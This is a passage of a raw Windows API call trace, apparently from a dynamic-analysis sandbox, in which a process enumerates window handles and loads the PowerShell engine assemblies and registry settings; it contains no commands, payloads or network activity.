0x6d0 [0070.814] GetLastError () returned 0x514 [0070.814] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x568 [0070.814] GetLastError () returned 0x514 [0070.814] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.814] GetLastError () returned 0x514 [0070.814] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x54c [0070.814] GetLastError () returned 0x514 [0070.815] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.815] GetLastError () returned 0x514 [0070.815] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x51c [0070.815] GetLastError () returned 0x514 [0070.815] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.815] GetLastError () returned 0x514 [0070.815] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.815] GetLastError () returned 0x514 [0070.816] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.816] GetLastError () returned 0x514 [0070.816] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7d8 [0070.816] GetLastError () returned 0x514 [0070.816] GetWindowThreadProcessId (in: hWnd=0x30108, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x5a8 [0070.816] GetLastError () returned 0x514 [0070.816] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.817] GetLastError () returned 0x514 [0070.817] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4f0 [0070.817] GetLastError () returned 0x514 [0070.817] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.817] GetLastError () returned 0x514 [0070.817] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.817] GetLastError () returned 0x514 [0070.817] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.818] GetLastError () returned 0x514 [0070.818] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x478 [0070.818] GetLastError () returned 0x514 [0070.818] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x550 [0070.818] GetLastError () returned 0x514 [0070.818] GetWindowThreadProcessId (in: hWnd=0x100ea, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.818] GetLastError () returned 0x514 [0070.818] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7ec [0070.819] GetLastError () returned 0x514 [0070.819] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.819] GetLastError () returned 0x514 [0070.819] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4ec [0070.819] GetLastError () returned 0x514 [0070.819] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.819] GetLastError () returned 0x514 [0070.820] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x978 [0070.820] GetLastError () returned 0x514 [0070.820] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0xaac [0070.820] GetLastError () returned 0x514 [0070.820] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x878 [0070.820] GetLastError () returned 0x514 [0070.820] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x868 [0070.820] GetLastError () returned 0x514 [0070.821] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x858 [0070.821] GetLastError () returned 0x514 [0070.821] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x848 [0070.821] GetLastError () returned 0x514 [0070.821] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x834 [0070.821] GetLastError () returned 0x514 [0070.821] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x824 [0070.821] GetLastError () returned 0x514 [0070.822] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x814 [0070.822] GetLastError () returned 0x514 [0070.822] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x804 [0070.822] GetLastError () returned 0x514 [0070.822] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x214 [0070.822] GetLastError () returned 0x514 [0070.822] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x49c [0070.823] GetLastError () returned 0x514 [0070.823] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x530 [0070.823] GetLastError () returned 0x514 [0070.823] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x6e4 [0070.823] GetLastError () returned 0x514 [0070.823] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7e8 [0070.823] GetLastError () returned 0x514 [0070.823] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x64 [0070.824] GetLastError () returned 0x514 [0070.824] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x390 [0070.824] GetLastError () returned 0x514 [0070.824] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4a0 [0070.824] GetLastError () returned 0x514 [0070.824] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x52c [0070.824] GetLastError () returned 0x514 [0070.824] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x608 [0070.824] GetLastError () returned 0x514 [0070.825] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x600 [0070.825] GetLastError () returned 0x514 [0070.825] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x72c [0070.825] GetLastError () returned 0x514 [0070.825] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x73c [0070.825] GetLastError () returned 0x514 [0070.825] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x714 [0070.825] GetLastError () returned 0x514 [0070.825] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x558 [0070.826] GetLastError () returned 0x514 [0070.826] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x6d0 [0070.826] GetLastError () returned 0x514 [0070.826] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.826] GetLastError () returned 0x514 [0070.826] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x7d8 [0070.826] GetLastError () returned 0x514 [0070.826] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x5a8 [0070.826] GetLastError () returned 0x514 [0070.826] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x4f0 [0070.827] GetLastError () returned 0x514 [0070.827] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x498 [0070.827] GetLastError () returned 0x514 [0070.827] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xce410 | out: lpdwProcessId=0xce410) returned 0x550 [0070.827] GetLastError () returned 0x514 [0070.827] GetLastError () returned 0x514 [0070.855] WerSetFlags () returned 0x0 [0070.890] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0070.894] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce7ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce7e8 | out: pulNumLanguages=0xce7ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xce7e8) returned 1 [0070.894] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xce7ec, pwszLanguagesBuffer=0x2a6bf48, pcchLanguagesBuffer=0xce7e8 | out: pulNumLanguages=0xce7ec, pwszLanguagesBuffer=0x2a6bf48, pcchLanguagesBuffer=0xce7e8) returned 1 [0070.906] GetUserDefaultLocaleName (in: lpLocaleName=0x2d1690, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0070.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.940] GetLastError () returned 0xcb [0070.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.966] GetLastError () returned 0xcb [0070.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.969] GetLastError () returned 0xcb [0070.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce25c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.998] GetLastError () returned 0xcb [0070.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce278, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0070.998] GetLastError () returned 0xcb [0070.998] SetErrorMode (uMode=0x1) returned 0x1 [0070.999] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", fInfoLevelId=0x0, lpFileInformation=0xce6f8 | out: lpFileInformation=0xce6f8) returned 1 [0070.999] GetLastError () returned 0xcb [0070.999] SetErrorMode (uMode=0x1) returned 0x1 [0070.999] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xce77c | out: lpdwHandle=0xce77c) returned 0x94c [0071.005] GetLastError () returned 0x0 [0071.005] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a6e478 | out: lpData=0x2a6e478) returned 1 [0071.009] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xce748, puLen=0xce744 | out: lplpBuffer=0xce748*=0x2a6e514, puLen=0xce744) returned 1 [0071.009] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e5f0, puLen=0xce6c0) returned 1 [0071.009] lstrlenW (lpString="Microsoft Corporation") returned 21 [0071.009] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0071.009] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e644, puLen=0xce6c0) returned 1 [0071.009] lstrlenW (lpString="System.Management.Automation") returned 28 [0071.009] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0071.010] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e6a0, puLen=0xce6c0) returned 1 [0071.010] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.010] lstrcpyW (in: lpString1=0x2d1690, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.010] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e6e0, puLen=0xce6c0) returned 1 [0071.010] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.010] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.010] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e748, puLen=0xce6c0) returned 1 [0071.010] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0071.010] lstrcpyW (in: lpString1=0x2d1690, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0071.010] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e7e4, puLen=0xce6c0) returned 1 [0071.010] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.011] lstrcpyW (in: lpString1=0x2d1690, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.011] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e848, puLen=0xce6c0) returned 1 [0071.011] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0071.011] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0071.011] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e8c4, puLen=0xce6c0) returned 1 [0071.011] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.011] lstrcpyW (in: lpString1=0x2d1690, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.011] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x2a6e56c, puLen=0xce6c0) returned 1 [0071.011] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0071.011] lstrcpyW (in: lpString1=0x2d1690, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0071.011] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x0, puLen=0xce6c0) returned 0 [0071.012] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x0, puLen=0xce6c0) returned 0 [0071.012] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xce6c4, puLen=0xce6c0 | out: lplpBuffer=0xce6c4*=0x0, puLen=0xce6c0) returned 0 [0071.012] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xce6b8, puLen=0xce6b4 | out: lplpBuffer=0xce6b8*=0x2a6e514, puLen=0xce6b4) returned 1 [0071.012] VerLanguageNameW (in: wLang=0x0, szLang=0x2d1690, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0071.012] VerQueryValueW (in: pBlock=0x2a6e478, lpSubBlock="\\", lplpBuffer=0xce6cc, puLen=0xce6c8 | out: lplpBuffer=0xce6cc*=0x2a6e4a0, puLen=0xce6c8) returned 1 [0071.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.022] GetLastError () returned 0xcb [0071.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.049] GetLastError () returned 0xcb [0071.058] lstrlenW (lpString="䅁") returned 1 [0071.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce690 | out: phkResult=0xce690*=0x310) returned 0x0 [0071.065] RegOpenKeyExW (in: hKey=0x310, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xce694 | out: phkResult=0xce694*=0x314) returned 0x0 [0071.065] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce6c8 | out: phkResult=0xce6c8*=0x318) returned 0x0 [0071.068] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce708, lpData=0x0, lpcbData=0xce704*=0x0 | out: lpType=0xce708*=0x1, lpData=0x0, lpcbData=0xce704*=0x56) returned 0x0 [0071.070] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce708, lpData=0x2d1690, lpcbData=0xce704*=0x56 | out: lpType=0xce708*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce704*=0x56) returned 0x0 [0071.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.075] GetLastError () returned 0x0 [0071.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.078] GetLastError () returned 0x0 [0071.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.091] GetLastError () returned 0x0 [0071.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.115] GetLastError () returned 0xcb [0071.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0071.644] GetLastError () returned 0x2 [0071.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0071.644] GetLastError () returned 0x2 [0071.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.836] GetLastError () returned 0xcb [0071.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.838] GetLastError () returned 0xcb [0071.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.891] GetLastError () returned 0xcb [0071.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.894] GetLastError () returned 0xcb [0071.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.894] GetLastError () returned 0xcb [0072.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0072.233] GetLastError () returned 0x0 [0072.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0072.234] GetLastError () returned 0x0 [0072.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.297] GetLastError () returned 0xcb [0072.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.301] GetLastError () returned 0xcb [0072.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0072.411] GetLastError () returned 0x7e [0072.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0072.411] GetLastError () returned 0x7e [0073.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0073.575] GetLastError () returned 0x2 [0073.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0073.576] GetLastError () returned 0x2 [0073.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0073.999] GetLastError () returned 0x2 [0073.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0073.999] GetLastError () returned 0x2 [0074.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0074.282] GetLastError () returned 0x2 